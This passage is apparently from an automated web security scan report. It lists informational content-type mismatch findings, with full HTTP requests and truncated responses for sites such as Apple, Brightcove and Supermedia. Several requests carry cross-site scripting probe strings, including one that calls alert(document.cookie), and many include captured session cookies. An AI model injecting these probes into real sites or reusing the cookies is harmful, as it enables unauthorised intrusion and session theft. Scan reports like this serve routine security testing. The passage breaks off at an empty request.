HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Thu, 03 Feb 2011 22:05:59 GMT
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

File not found.

31.54. http://core.videoegg.com/sites/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://core.videoegg.com
Path:   /sites/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sites/ HTTP/1.1
Host: core.videoegg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-2047109742-1295039241849;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Thu, 03 Feb 2011 22:06:00 GMT
Connection: close
Cache-Control: max-age=3600, s-maxage=3600, public

File not found.

31.55. http://core.videoegg.com/sites/advertise.tucows.com.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://core.videoegg.com
Path:   /sites/advertise.tucows.com.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sites/advertise.tucows.com.js HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=1&cb=975bbd80
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Fri, 04 Feb 2011 02:22:58 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=3600, s-maxage=3600, public

File not found.

31.56. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://fpdownload.macromedia.com
Path:   /get/flashplayer/current/swflash.cab

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /get/flashplayer/current/swflash.cab HTTP/1.1
Host: fpdownload.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Oct 2010 23:47:03 GMT
ETag: "b72012-2a53a6-9bea6bc0"
Accept-Ranges: bytes
Content-Length: 2773926
Content-Type: text/plain
Date: Thu, 03 Feb 2011 22:06:12 GMT
Connection: close

MSCF.....=*.....D............................=*.................W..............;.s .swflash.inf..%+.......U=.. .FP_AX_CAB_INSTALLER.exe...~..@..[...
.`;v."Sp$......g...BN..0.C.8AH+..
0..H.....pv.90.;.
...[SNIP]...

31.57. http://goku.brightcove.com/1pix.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://goku.brightcove.com
Path:   /1pix.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /1pix.gif?dcsdat=1296761715320&lang=en&dcssip=&os=Windows%20Server%202008%20R2&dcsref=https%3A//www.supermedia.com/spportal/spportalFlow.do%3F%27%2522--%253E%253C/style%253E%253C/script%253E%253Cscript%253Ealert%280x000043%29%253C/script%253E&playerURL=https%3A//www.supermedia.com/careers&flashVer=WIN%2010%2C1%2C103%2C20&publisherId=62009824001&sourceId=62009824001&playerTag=&dcsuri=/viewer/player_load&playerId=64829845001&affiliateId= HTTP/1.1
Host: goku.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:34:39 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 49
Content-Type: text/plain

GIF89a...................!.......,...........T..;

31.58. https://iforgot.apple.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://iforgot.apple.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: iforgot.apple.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:58:05 GMT
Server: Apache
Last-Modified: Sat, 13 Feb 2010 01:41:35 GMT
ETag: "4ba38-1e66-47f717bfc31c0"
Accept-Ranges: bytes
Content-Length: 7782
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

..............h...F...........h....... ...........    .. ..............(....... ...........@.............................................................................................................
...[SNIP]...

31.59. http://images.apple.com/global/nav/scripts/globalnav.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://images.apple.com
Path:   /global/nav/scripts/globalnav.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
Cache-Control: max-age=0
If-Modified-Since: Sat, 29 Jan 2011 00:26:09 GMT
Accept: */*
If-None-Match: "6f06-49af13aac2a40"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_ppv=100%2C100%2C1012%2C; s_orientationHeight=1012; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 29 Jan 2011 00:26:09 GMT
ETag: "6f06-49af13aac2a40"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Server: Apache/2.2.11 (Unix)
ntCoent-length: 28422
Cache-Control: max-age=558
Expires: Thu, 03 Feb 2011 17:56:26 GMT
Date: Thu, 03 Feb 2011 17:47:08 GMT
Connection: close
Content-Length: 28422

if(typeof(AC)=="undefined"){AC={}}document.createElement("nav");AC.addEvent=function(b,a,c){if(b.addEventListener){return b.addEventListener(a,c,false)
}else{return b.attachEvent("on"+a,c)}};AC.remove
...[SNIP]...

31.60. http://ir.supermedia.com/common/images/icon_share.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /common/images/icon_share.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /common/images/icon_share.gif HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NOMOBILE=0; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463

Response

HTTP/1.1 200 OK
Content-Length: 3838
Content-Type: image/gif
Content-Location: http://ir.supermedia.com/common/images/icon_share.gif
Last-Modified: Mon, 20 Jul 2009 16:54:59 GMT
Accept-Ranges: bytes
ETag: "7b465d15a9ca1:93385"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 19:09:43 GMT

.PNG
.
...IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

31.61. http://ir.supermedia.com/common/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /common/mobile/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /common/mobile/ HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:35:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


   <!-- Parameters Passed are Invalid (err: 102) -->
   

31.62. http://l0.scanscout.com/ssframework/logController.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l0.scanscout.com
Path:   /ssframework/logController.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /ssframework/logController.xml HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; osh=626_1296767643681; behavioralSegments=29_110203_2|32_110203_2|263_110203
Content-Length: 617

Srpc=yahoo%5Ftag%3Ascanscout%5Fus%5Fctxt%3B&Ucty=washington&a=logitemaction&VI=33687174&RmT=0&PC=0&RwT=5&ADst=B&Uctry=us&PmC=2&UareV=5%2E11%2E0%2E01&ADI=5933178&RovC=0&RrC=2&PI=626&RC=2&RvN=1&CbC=1&PR
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:09 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: networkInfo=57058|110203_161409|626|33687174|null|5933178|1414196|1|12.0|true|1|true|us|V|717380|2||57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: campUnique=1414196_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: sssrvyhst2=110203_1414196|110203_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EC2ECA527A6D86A1BF90D5DB051B04A3; Path=/ssframework
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2

0

31.63. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The response contains the following Content-type statement:The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Accept: */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: maps.gstatic.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Fri, 04 Feb 2011 02:36:06 GMT
Expires: Fri, 04 Feb 2011 02:36:06 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 326
X-XSS-Protection: 1; mode=block

...... ......0.......(... ...@...............................................................................................................................?...w...g...............................
...[SNIP]...

31.64. https://mktws.apple.com/acdws/notify.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://mktws.apple.com
Path:   /acdws/notify.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /acdws/notify.js HTTP/1.1
Host: mktws.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:47:31 GMT
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l mod_jk/1.2.26
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:48:31 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
ETag: W/"20-1202883300000"
Last-Modified: Tue, 01 Feb 2011 08:40:26 GMT
Content-Length: 20
Connection: close
Content-Type: text/javascript

signalStatus("on");

31.65. https://mktws.apple.com/acdwsweb/ACDwsAction.do  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://mktws.apple.com
Path:   /acdwsweb/ACDwsAction.do

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /acdwsweb/ACDwsAction.do HTTP/1.1
Host: mktws.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:47:24 GMT
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l mod_jk/1.2.26
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:48:24 GMT
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Set-Cookie: JSESSIONID=73B6AECF367E236B1FFEBC7FD237DFD7.node2; Path=/; Secure
Cache-Control: no-cache
Expires: Wed, 08 Apr 2607 23:32:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 14

null("bad");

31.66. http://mobile.jackpotcity.com/controls/captcha.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mobile.jackpotcity.com
Path:   /controls/captcha.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /controls/captcha.aspx HTTP/1.1
Host: mobile.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://mobile.jackpotcity.com/?vp=jpc403475513
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmb=26101158; __utmc=26101158; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral; ASP.NET_SessionId=1gj5cr2idrfdnk55bux11f55; CCH=JPM; FCVR=1412626935

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/jpeg; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:30:10 GMT
Content-Length: 4551

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......2...."..............................
...[SNIP]...

31.67. http://my.supermedia.com/includes/captcha/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.supermedia.com
Path:   /includes/captcha/index.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /includes/captcha/index.jsp HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://my.supermedia.com/directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:44:06 GMT
Content-Type: image/jpeg
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:44 GMT;path=/;httponly
Cache-Control: private
Content-Length: 1307

......JFIF.............C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......#.K.."..............................
...[SNIP]...

31.68. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: rad.msn.com
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135&TUID=1; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC00=FB=AgEAVQ5AiKgB; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 3788
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8316227-T38204966-C38000000000040202
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Fri, 04 Feb 2011 02:29:40 GMT
Content-Length: 3788


//<![CDATA[
function getRADIds() { return{"adid":"38000000000040202","pid":"8316227","targetid":"38204966"};} document.write('<img src="'+encodeURI('http://ad.doubleclick.net/ad/N3671.msnmidfunnel.c
...[SNIP]...

31.69. http://sr2.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=6964264 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/browse/home/shop_ipod/family/ipod_classic?mco=MTM3NTMxMzA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_BETA//hcpv/emt/mtag.js?site=6964264
Last-Modified: Sun, 17 Oct 2010 14:38:28 GMT
Accept-Ranges: bytes
ETag: "4de42f686ecb1:12b6"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 17:50:35 GMT
Connection: close
Content-Length: 17314

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

31.70. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sr2.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LivePersonID=LP i=16101423669632,d=1294435351;

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Thu, 03 Feb 2011 17:52:34 GMT
Connection: close

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

31.71. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

